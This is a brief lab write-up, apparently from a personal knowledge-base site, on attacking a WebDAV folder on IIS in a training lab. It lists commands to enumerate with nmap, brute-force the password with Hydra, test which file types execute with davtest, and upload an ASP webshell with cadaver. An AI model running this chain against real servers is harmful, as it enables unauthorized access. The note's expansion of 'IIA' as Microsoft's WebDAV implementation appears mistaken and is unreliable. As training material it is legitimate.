Noosphere

WebDav vulnerability scanning

2 min read

First of all what’s IIA

  • IIA (Internet Information Access) is Microsoft’s WebDAV implementation for managing files over HTTP/S.
  • It enables users to upload, edit, and delete web content remotely.
  • Integrated into IIS, it provides web authoring capabilities.
  • Misconfigurations can lead to security risks like unauthorized file uploads.
  • Often monitored in security assessments for potential exploitation vectors.
  • 80 & 443

After this in the lab I’ve done I found that there was this IIA service running in port 80 and I used a couple of new tools.

Davtest & Cadaver

Davtest

Essentially used to check whether the WebDav service is vulnerable to any kind of file execution , for example in this lab I discovered the target could execute asp files.

Cadaver

Cadaver is a command-line WebDAV client used to interact with WebDAV-enabled servers. In WebDAV exploitation, it helps upload malicious files or manipulate resources on vulnerable servers to gain unauthorized access or execute attacks.

Used commands in WebDav Lab

sudo nmap -sV -p 80 --script=http-enum # Checking for WebDav
 
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
# WebDav directory is password protected , must use Hydra.
 
hydra -L /usr/share/metasploit/wordlists/common_users.txt -P /usr/share/metasploit/wordlists/common_passwords.txt IP http-get /webdav/
 
# We must take care about DOS.
# After executing this we should get the password , for this lab we already got it.
 
 
# Using davtest now.
 
davtest --auth user:password --url http://ip/webdav
 
 Checking for test file execution
EXEC    jhtml   FAIL
EXEC    aspx    FAIL
EXEC    asp     SUCCEED:        http://demo.ine.local/webdav/DavTestDir_NABkBEUGKFIYcmM/davtest_NABkBEUGKFIYcmM.asp
EXEC    asp     FAIL
EXEC    html    SUCCEED:        http://demo.ine.local/webdav/DavTestDir_NABkBEUGKFIYcmM/davtest_NABkBEUGKFIYcmM.html
EXEC    html    FAIL
EXEC    php     FAIL
EXEC    shtml   FAIL
EXEC    txt     SUCCEED:        http://demo.ine.local/webdav/DavTestDir_NABkBEUGKFIYcmM/davtest_NABkBEUGKFIYcmM.txt
EXEC    txt     FAIL
EXEC    pl      FAIL
EXEC    jsp     FAIL
EXEC    cfm     FAIL
EXEC    cgi     FAIL
 
# We got what we wanted , which files can we execute , asp in this case.
 
 
# Next step is to upload a webshell. We need to use cadaver.
 
cadaver http://demo.ine.local 
 
# Asks for authentication
 
# Webshell from
 
put /usr/share/webshells/asp/webshell.asp
 
# We got access to the server :D

Graph View

Backlinks